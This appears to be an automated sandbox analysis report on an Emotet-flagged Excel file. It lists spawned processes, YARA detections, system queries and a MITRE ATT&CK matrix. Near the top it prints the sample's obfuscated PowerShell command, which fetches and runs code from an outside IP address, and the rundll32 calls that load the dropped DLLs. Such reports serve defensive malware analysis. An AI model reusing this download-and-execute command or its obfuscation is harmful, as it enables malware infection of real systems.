                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCOJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: imedpub_6.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
